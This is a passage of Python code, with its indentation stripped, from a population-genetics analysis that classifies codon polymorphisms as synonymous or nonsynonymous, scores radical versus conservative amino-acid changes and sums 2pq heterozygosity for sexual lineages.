sex_sum2PQ_R1 = 0
sex_sum2PQ_R2 = 0
sex_sum2PQ_R3 = 0
sex_sum2PQ_R4 = 0
sex_sum2PQ_R5 = 0
sex_sum2PQ_R6 = 0
sex_sum2PQ_R7 = 0
sex_sum2PQ_meanC = 0
sex_sum2PQ_meanR = 0
sex_synS = 0
sex_nsynS = 0
sex_con1S = 0
sex_con2S = 0
sex_con3S = 0
sex_con4S = 0
sex_con5S = 0
sex_con6S = 0
sex_con7S = 0
sex_meanConS = 0
sex_rad1S = 0
sex_rad2S = 0
sex_rad3S = 0
sex_rad4S = 0
sex_rad5S = 0
sex_rad6S = 0
sex_rad7S = 0
sex_meanRadS = 0
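# Tally codon alleles at each position across the sexual sequences, skipping
# codons that contain 'N' or alignment gaps ('-').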
i = 0
while i < len(codonDict[seqList[0]]):
outCodon = outCodons[i]
gene = False
for locus in positionDict:
start = locus[0]
stop = locus[1]
if i*3 >= start and i*3 <= stop:
gene = positionDict[locus]
currAlleleDict = {}
currAlleleList = []
currAADict = {}
for seq in sexList:
currCodons = codonDict[seq]
currCodon = currCodons[i]
if currCodon not in currAlleleDict and 'N' not in currCodon and '-' not in currCodon:
currAlleleDict[currCodon] = 1
currAlleleList.append(currCodon)
elif 'N' not in currCodon and '-' not in currCodon:
currValue = currAlleleDict[currCodon]
currValue += 1
currAlleleDict[currCodon] = currValue
if len(currAlleleDict) > 1:
totalIndividuals = 0
site1 = []
site2 = []
site3 = []
for codon in currAlleleList:
totalIndividuals += currAlleleDict[codon]
if codon[0] not in site1:
site1.append(codon[0])
if codon[1] not in site2:
site2.append(codon[1])
if codon[2] not in site3:
site3.append(codon[2])
currFreqDict = {}
totalChanges = (len(site1) - 1) + (len(site2) - 1) + (len(site3) - 1)
variableSites = []
if len(site1) > 1:
variableSites.append(i*3)
if len(site2) > 1:
variableSites.append((i*3) + 1)
if len(site3) > 1:
variableSites.append((i*3) + 2)
aaList = []
twoPQ = 2
for codon in currAlleleDict:
freq = float(currAlleleDict[codon])/totalIndividuals
currFreqDict[codon] = freq
if i == 0 and codon in startCodons:
aa = 'M'
else:
aa = geneticCode[codon]
currAADict[codon] = aa
if aa not in aaList:
aaList.append(aa)
if totalChanges == 1:
for codon in currAlleleDict:
freq = float(currAlleleDict[codon])/totalIndividuals
currFreqDict[codon] = freq
twoPQ *= freq
if len(aaList) == 1:
sex_synS += 1
sex_sum2PQ_S += twoPQ
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ) + '\n')
else:
sex_nsynS += 1
sex_sum2PQ_N += twoPQ
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList[0] + ';' + aaList[1] + '\tP\tN')
mutType = CRI(aaList) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
sex_con1S += 1
sex_sum2PQ_C1 += twoPQ
else:
sex_rad1S += 1
sex_sum2PQ_R1 += twoPQ
if mutType[1] == 0:
sex_con2S += 1
sex_sum2PQ_C2 += twoPQ
else:
sex_rad2S += 1
sex_sum2PQ_R2 += twoPQ
if mutType[2] == 0:
sex_con3S += 1
sex_sum2PQ_C3 += twoPQ
else:
sex_rad3S += 1
sex_sum2PQ_R3 += twoPQ
if mutType[3] == 0:
sex_con4S += 1
sex_sum2PQ_C4 += twoPQ
else:
sex_rad4S += 1
sex_sum2PQ_R4 += twoPQ
if mutType[4] == 0:
sex_con5S += 1
sex_sum2PQ_C5 += twoPQ
else:
sex_rad5S += 1
sex_sum2PQ_R5 += twoPQ
if mutType[5] == 0:
sex_con6S += 1
sex_sum2PQ_C6 += twoPQ
else:
sex_rad6S += 1
sex_sum2PQ_R6 += twoPQ
if mutType[6] == 0:
sex_con7S += 1
sex_sum2PQ_C7 += twoPQ
else:
sex_rad7S += 1
sex_sum2PQ_R7 += twoPQ
if mutType[7] <= 0.5:
sex_meanConS += 1
sex_sum2PQ_meanC += twoPQ
else:
sex_meanRadS += 1
sex_sum2PQ_meanR += twoPQ
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ) + '\n')
elif totalChanges == 2:
if len(currAlleleDict) == 3:
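# Three alleles at this codon: count pairwise nucleotide differences between
# each pair of alleles (ab, ac, bc) to infer the order of the two changes.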
ab = 0
ac = 0
bc = 0
codonA = currAlleleList[0]
codonB = currAlleleList[1]
codonC = currAlleleList[2]
if codonA[0] != codonB[0]:
ab += 1
if codonA[1] != codonB[1]:
ab += 1
if codonA[2] != codonB[2]:
ab += 1
if codonA[0] != codonC[0]:
ac += 1
if codonA[1] != codonC[1]:
ac += 1
if codonA[2] != codonC[2]:
ac += 1
if codonC[0] != codonB[0]:
bc += 1
if codonC[1] != codonB[1]:
bc += 1
if codonC[2] != codonB[2]:
bc += 1
if ab == ac and ac == bc:
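# Equal pairwise distances: all three alleles differ at the same position, so
# the outgroup codon identifies the ancestral allele and the other two alleles
# are each scored against it.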
if 'N' not in outCodon and '-' not in outCodon:
if outCodon == codonA:
aaList1 = [currAADict[codonA],currAADict[codonB]]
aaList2 = [currAADict[codonA],currAADict[codonC]]
codonList1 = [codonA,codonB]
codonList2 = [codonA,codonC]
if aaList1[0] == aaList1[1]:
if aaList2[0] == aaList2[1]:
sex_synS += 2
twoPQ = 4
for allele in currFreqDict:
twoPQ *= currFreqDict[allele]
sex_sum2PQ_S += twoPQ
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ) + '\n')
else:
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #syn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #nsyn
sex_sum2PQ_S += twoPQ1
sex_sum2PQ_N += twoPQ2
sex_synS += 1
sex_nsynS += 1
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList1[0] + ',freq=' + str(currFreqDict[codonList1[0]]))
for codon in codonList1[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList1[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ1) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList2[0] + ',freq=' + str(currFreqDict[codonList2[0]]))
for codon in codonList2[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + ';' + aaList2[1] + '\tP\tN')
mutType = CRI(aaList2) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
sex_con1S += 1
sex_sum2PQ_C1 += twoPQ2
else:
sex_rad1S += 1
sex_sum2PQ_R1 += twoPQ2
if mutType[1] == 0:
sex_con2S += 1
sex_sum2PQ_C2 += twoPQ2
else:
sex_rad2S += 1
sex_sum2PQ_R2 += twoPQ2
if mutType[2] == 0:
sex_con3S += 1
sex_sum2PQ_C3 += twoPQ2
else:
sex_rad3S += 1
sex_sum2PQ_R3 += twoPQ2
if mutType[3] == 0:
sex_con4S += 1
sex_sum2PQ_C4 += twoPQ2
else:
sex_rad4S += 1
sex_sum2PQ_R4 += twoPQ2
if mutType[4] == 0:
sex_con5S += 1
sex_sum2PQ_C5 += twoPQ2
else:
sex_rad5S += 1
sex_sum2PQ_R5 += twoPQ2
if mutType[5] == 0:
sex_con6S += 1
sex_sum2PQ_C6 += twoPQ2
else:
sex_rad6S += 1
sex_sum2PQ_R6 += twoPQ2
if mutType[6] == 0:
sex_con7S += 1
sex_sum2PQ_C7 += twoPQ2
else:
sex_rad7S += 1
sex_sum2PQ_R7 += twoPQ2
if mutType[7] <= 0.5:
sex_meanConS += 1
sex_sum2PQ_meanC += twoPQ2
else:
sex_meanRadS += 1
sex_sum2PQ_meanR += twoPQ2
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ2) + '\n')
elif aaList2[0] == aaList2[1]:
sex_nsynS += 1
sex_synS += 1
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #nsyn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #syn
sex_sum2PQ_S += twoPQ2
sex_sum2PQ_N += twoPQ1
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList2[0] + ',freq=' + str(currFreqDict[codonList2[0]]))
for codon in codonList2[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ2) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList1[0] + ',freq=' + str(currFreqDict[codonList1[0]]))
for codon in codonList1[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList1[0] + ';' + aaList1[1] + '\tP\tN')
mutType = CRI(aaList1) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
sex_con1S += 1
sex_sum2PQ_C1 += twoPQ1
else:
sex_rad1S += 1
sex_sum2PQ_R1 += twoPQ1
if mutType[1] == 0:
sex_con2S += 1
sex_sum2PQ_C2 += twoPQ1
else:
sex_rad2S += 1
sex_sum2PQ_R2 += twoPQ1
if mutType[2] == 0:
sex_con3S += 1
sex_sum2PQ_C3 += twoPQ1
else:
sex_rad3S += 1
sex_sum2PQ_R3 += twoPQ1
if mutType[3] == 0:
sex_con4S += 1
sex_sum2PQ_C4 += twoPQ1
else:
sex_rad4S += 1
sex_sum2PQ_R4 += twoPQ1
if mutType[4] == 0:
sex_con5S += 1
sex_sum2PQ_C5 += twoPQ1
else:
sex_rad5S += 1
sex_sum2PQ_R5 += twoPQ1
if mutType[5] == 0:
sex_con6S += 1
sex_sum2PQ_C6 += twoPQ1
else:
sex_rad6S += 1
sex_sum2PQ_R6 += twoPQ1
if mutType[6] == 0:
sex_con7S += 1
sex_sum2PQ_C7 += twoPQ1
else:
sex_rad7S += 1
sex_sum2PQ_R7 += twoPQ1
if mutType[7] <= 0.5:
sex_meanConS += 1
sex_sum2PQ_meanC += twoPQ1
else:
sex_meanRadS += 1
sex_sum2PQ_meanR += twoPQ1
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ1) + '\n')
else:
sex_nsynS += 2
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #nsyn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #nsyn
sex_sum2PQ_N += twoPQ1 + twoPQ2
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList1[0] + ',freq=' + str(currFreqDict[codonList1[0]]))
for codon in codonList1[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList1[0] + ';' + aaList1[1] + '\tP\tN')
mutType = CRI(aaList1) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
sex_con1S += 1
sex_sum2PQ_C1 += twoPQ1
else:
sex_rad1S += 1
sex_sum2PQ_R1 += twoPQ1
if mutType[1] == 0:
sex_con2S += 1
sex_sum2PQ_C2 += twoPQ1
else:
sex_rad2S += 1
sex_sum2PQ_R2 += twoPQ1
if mutType[2] == 0:
sex_con3S += 1
sex_sum2PQ_C3 += twoPQ1
else:
sex_rad3S += 1
sex_sum2PQ_R3 += twoPQ1
if mutType[3] == 0:
sex_con4S += 1
sex_sum2PQ_C4 += twoPQ1
else:
sex_rad4S += 1
sex_sum2PQ_R4 += twoPQ1
if mutType[4] == 0:
sex_con5S += 1
sex_sum2PQ_C5 += twoPQ1
else:
sex_rad5S += 1
sex_sum2PQ_R5 += twoPQ1
if mutType[5] == 0:
sex_con6S += 1
sex_sum2PQ_C6 += twoPQ1
else:
sex_rad6S += 1
sex_sum2PQ_R6 += twoPQ1
if mutType[6] == 0:
sex_con7S += 1
sex_sum2PQ_C7 += twoPQ1
else:
sex_rad7S += 1
sex_sum2PQ_R7 += twoPQ1
if mutType[7] <= 0.5:
sex_meanConS += 1
sex_sum2PQ_meanC += twoPQ1
else:
sex_meanRadS += 1
sex_sum2PQ_meanR += twoPQ1
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ1) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList2[0] + ',freq=' + str(currFreqDict[codonList2[0]]))
for codon in codonList2[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + ';' + aaList2[1] + '\tP\tN')
mutType = CRI(aaList2) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
sex_con1S += 1
sex_sum2PQ_C1 += twoPQ2
else:
sex_rad1S += 1
sex_sum2PQ_R1 += twoPQ2
if mutType[1] == 0:
sex_con2S += 1
sex_sum2PQ_C2 += twoPQ2
else:
sex_rad2S += 1
sex_sum2PQ_R2 += twoPQ2
if mutType[2] == 0:
sex_con3S += 1
sex_sum2PQ_C3 += twoPQ2
else:
sex_rad3S += 1
sex_sum2PQ_R3 += twoPQ2
if mutType[3] == 0:
sex_con4S += 1
sex_sum2PQ_C4 += twoPQ2
else:
sex_rad4S += 1
sex_sum2PQ_R4 += twoPQ2
if mutType[4] == 0:
sex_con5S += 1
sex_sum2PQ_C5 += twoPQ2
else:
sex_rad5S += 1
sex_sum2PQ_R5 += twoPQ2
if mutType[5] == 0:
sex_con6S += 1
sex_sum2PQ_C6 += twoPQ2
else:
sex_rad6S += 1
sex_sum2PQ_R6 += twoPQ2
if mutType[6] == 0:
sex_con7S += 1
sex_sum2PQ_C7 += twoPQ2
else:
sex_rad7S += 1
sex_sum2PQ_R7 += twoPQ2
if mutType[7] <= 0.5:
sex_meanConS += 1
sex_sum2PQ_meanC += twoPQ2
else:
sex_meanRadS += 1
sex_sum2PQ_meanR += twoPQ2
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ2) + '\n')
elif outCodon == codonB:
aaList1 = [currAADict[codonB],currAADict[codonA]]
aaList2 = [currAADict[codonB],currAADict[codonC]]
codonList1 = [codonB,codonA]
codonList2 = [codonB,codonC]
if aaList1[0] == aaList1[1]:
if aaList2[0] == aaList2[1]:
sex_synS += 2
twoPQ = 4
for allele in currFreqDict:
twoPQ *= currFreqDict[allele]
sex_sum2PQ_S += twoPQ
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ) + '\n')
else:
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #syn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #nsyn
sex_sum2PQ_S += twoPQ1
sex_sum2PQ_N += twoPQ2
sex_synS += 1
sex_nsynS += 1
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList1[0] + ',freq=' + str(currFreqDict[codonList1[0]]))
for codon in codonList1[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList1[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ1) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList2[0] + ',freq=' + str(currFreqDict[codonList2[0]]))
for codon in codonList2[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + ';' + aaList2[1] + '\tP\tN')
mutType = CRI(aaList2) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
sex_con1S += 1
sex_sum2PQ_C1 += twoPQ2
else:
sex_rad1S += 1
sex_sum2PQ_R1 += twoPQ2
if mutType[1] == 0:
sex_con2S += 1
sex_sum2PQ_C2 += twoPQ2
else:
sex_rad2S += 1
sex_sum2PQ_R2 += twoPQ2
if mutType[2] == 0:
sex_con3S += 1
sex_sum2PQ_C3 += twoPQ2
else:
sex_rad3S += 1
sex_sum2PQ_R3 += twoPQ2
if mutType[3] == 0:
sex_con4S += 1
sex_sum2PQ_C4 += twoPQ2
else:
sex_rad4S += 1
sex_sum2PQ_R4 += twoPQ2
if mutType[4] == 0:
sex_con5S += 1
sex_sum2PQ_C5 += twoPQ2
else:
sex_rad5S += 1
sex_sum2PQ_R5 += twoPQ2
if mutType[5] == 0:
sex_con6S += 1
sex_sum2PQ_C6 += twoPQ2
else:
sex_rad6S += 1
sex_sum2PQ_R6 += twoPQ2
if mutType[6] == 0:
sex_con7S += 1
sex_sum2PQ_C7 += twoPQ2
else:
sex_rad7S += 1
sex_sum2PQ_R7 += twoPQ2
if mutType[7] <= 0.5:
sex_meanConS += 1
sex_sum2PQ_meanC += twoPQ2
else:
sex_meanRadS += 1
sex_sum2PQ_meanR += twoPQ2
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ2) + '\n')
elif aaList2[0] == aaList2[1]:
sex_nsynS += 1
sex_synS += 1
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #nsyn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #syn
sex_sum2PQ_S += twoPQ2
sex_sum2PQ_N += twoPQ1
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList2[0] + ',freq=' + str(currFreqDict[codonList2[0]]))
for codon in codonList2[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ2) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList1[0] + ',freq=' + str(currFreqDict[codonList1[0]]))
for codon in codonList1[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList1[0] + ';' + aaList1[1] + '\tP\tN')
mutType = CRI(aaList1) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
sex_con1S += 1
sex_sum2PQ_C1 += twoPQ1
else:
sex_rad1S += 1
sex_sum2PQ_R1 += twoPQ1
if mutType[1] == 0:
sex_con2S += 1
sex_sum2PQ_C2 += twoPQ1
else:
sex_rad2S += 1
sex_sum2PQ_R2 += twoPQ1
if mutType[2] == 0:
sex_con3S += 1
sex_sum2PQ_C3 += twoPQ1
else:
sex_rad3S += 1
sex_sum2PQ_R3 += twoPQ1
if mutType[3] == 0:
sex_con4S += 1
sex_sum2PQ_C4 += twoPQ1
else:
sex_rad4S += 1
sex_sum2PQ_R4 += twoPQ1
if mutType[4] == 0:
sex_con5S += 1
sex_sum2PQ_C5 += twoPQ1
else:
sex_rad5S += 1
sex_sum2PQ_R5 += twoPQ1
if mutType[5] == 0:
sex_con6S += 1
sex_sum2PQ_C6 += twoPQ1
else:
sex_rad6S += 1
sex_sum2PQ_R6 += twoPQ1
if mutType[6] == 0:
sex_con7S += 1
sex_sum2PQ_C7 += twoPQ1
else:
sex_rad7S += 1
sex_sum2PQ_R7 += twoPQ1
if mutType[7] <= 0.5:
sex_meanConS += 1
sex_sum2PQ_meanC += twoPQ1
else:
sex_meanRadS += 1
sex_sum2PQ_meanR += twoPQ1
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ1) + '\n')
else:
sex_nsynS += 2
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #nsyn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #nsyn
sex_sum2PQ_N += twoPQ1 + twoPQ2
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList1[0] + ',freq=' + str(currFreqDict[codonList1[0]]))
for codon in codonList1[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList1[0] + ';' + aaList1[1] + '\tP\tN')
mutType = CRI(aaList1) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
sex_con1S += 1
sex_sum2PQ_C1 += twoPQ1
else:
sex_rad1S += 1
sex_sum2PQ_R1 += twoPQ1
if mutType[1] == 0:
sex_con2S += 1
sex_sum2PQ_C2 += twoPQ1
else:
sex_rad2S += 1
sex_sum2PQ_R2 += twoPQ1
if mutType[2] == 0:
sex_con3S += 1
sex_sum2PQ_C3 += twoPQ1
else:
sex_rad3S += 1
sex_sum2PQ_R3 += twoPQ1
if mutType[3] == 0:
sex_con4S += 1
sex_sum2PQ_C4 += twoPQ1
else:
sex_rad4S += 1
sex_sum2PQ_R4 += twoPQ1
if mutType[4] == 0:
sex_con5S += 1
sex_sum2PQ_C5 += twoPQ1
else:
sex_rad5S += 1
sex_sum2PQ_R5 += twoPQ1
if mutType[5] == 0:
sex_con6S += 1
sex_sum2PQ_C6 += twoPQ1
else:
sex_rad6S += 1
sex_sum2PQ_R6 += twoPQ1
if mutType[6] == 0:
sex_con7S += 1
sex_sum2PQ_C7 += twoPQ1
else:
sex_rad7S += 1
sex_sum2PQ_R7 += twoPQ1
if mutType[7] <= 0.5:
sex_meanConS += 1
sex_sum2PQ_meanC += twoPQ1
else:
sex_meanRadS += 1
sex_sum2PQ_meanR += twoPQ1
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ1) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList2[0] + ',freq=' + str(currFreqDict[codonList2[0]]))
for codon in codonList2[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + ';' + aaList2[1] + '\tP\tN')
mutType = CRI(aaList2) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
sex_con1S += 1
sex_sum2PQ_C1 += twoPQ2
else:
sex_rad1S += 1
sex_sum2PQ_R1 += twoPQ2
if mutType[1] == 0:
sex_con2S += 1
sex_sum2PQ_C2 += twoPQ2
else:
sex_rad2S += 1
sex_sum2PQ_R2 += twoPQ2
if mutType[2] == 0:
sex_con3S += 1
sex_sum2PQ_C3 += twoPQ2
else:
sex_rad3S += 1
sex_sum2PQ_R3 += twoPQ2
if mutType[3] == 0:
sex_con4S += 1
sex_sum2PQ_C4 += twoPQ2
else:
sex_rad4S += 1
sex_sum2PQ_R4 += twoPQ2
if mutType[4] == 0:
sex_con5S += 1
sex_sum2PQ_C5 += twoPQ2
else:
sex_rad5S += 1
sex_sum2PQ_R5 += twoPQ2
if mutType[5] == 0:
sex_con6S += 1
sex_sum2PQ_C6 += twoPQ2
else:
sex_rad6S += 1
sex_sum2PQ_R6 += twoPQ2
if mutType[6] == 0:
sex_con7S += 1
sex_sum2PQ_C7 += twoPQ2
else:
sex_rad7S += 1
sex_sum2PQ_R7 += twoPQ2
if mutType[7] <= 0.5:
sex_meanConS += 1
sex_sum2PQ_meanC += twoPQ2
else:
sex_meanRadS += 1
sex_sum2PQ_meanR += twoPQ2
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ2) + '\n')
elif outCodon == codonC:
aaList1 = [currAADict[codonC],currAADict[codonA]]
aaList2 = [currAADict[codonC],currAADict[codonB]]
codonList1 = [codonC,codonA]
codonList2 = [codonC,codonB]
if aaList1[0] == aaList1[1]:
if aaList2[0] == aaList2[1]:
sex_synS += 2
twoPQ = 4
for allele in currFreqDict:
twoPQ *= currFreqDict[allele]
sex_sum2PQ_S += twoPQ
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ) + '\n')
else:
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #syn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #nsyn
sex_sum2PQ_S += twoPQ1
sex_sum2PQ_N += twoPQ2
sex_synS += 1
sex_nsynS += 1
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList1[0] + ',freq=' + str(currFreqDict[codonList1[0]]))
for codon in codonList1[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList1[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ1) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList2[0] + ',freq=' + str(currFreqDict[codonList2[0]]))
for codon in codonList2[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + ';' + aaList2[1] + '\tP\tN')
mutType = CRI(aaList2) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
sex_con1S += 1
sex_sum2PQ_C1 += twoPQ2
else:
sex_rad1S += 1
sex_sum2PQ_R1 += twoPQ2
if mutType[1] == 0:
sex_con2S += 1
sex_sum2PQ_C2 += twoPQ2
else:
sex_rad2S += 1
sex_sum2PQ_R2 += twoPQ2
if mutType[2] == 0:
sex_con3S += 1
sex_sum2PQ_C3 += twoPQ2
else:
sex_rad3S += 1
sex_sum2PQ_R3 += twoPQ2
if mutType[3] == 0:
sex_con4S += 1
sex_sum2PQ_C4 += twoPQ2
else:
sex_rad4S += 1
sex_sum2PQ_R4 += twoPQ2
if mutType[4] == 0:
sex_con5S += 1
sex_sum2PQ_C5 += twoPQ2
else:
sex_rad5S += 1
sex_sum2PQ_R5 += twoPQ2
if mutType[5] == 0:
sex_con6S += 1
sex_sum2PQ_C6 += twoPQ2
else:
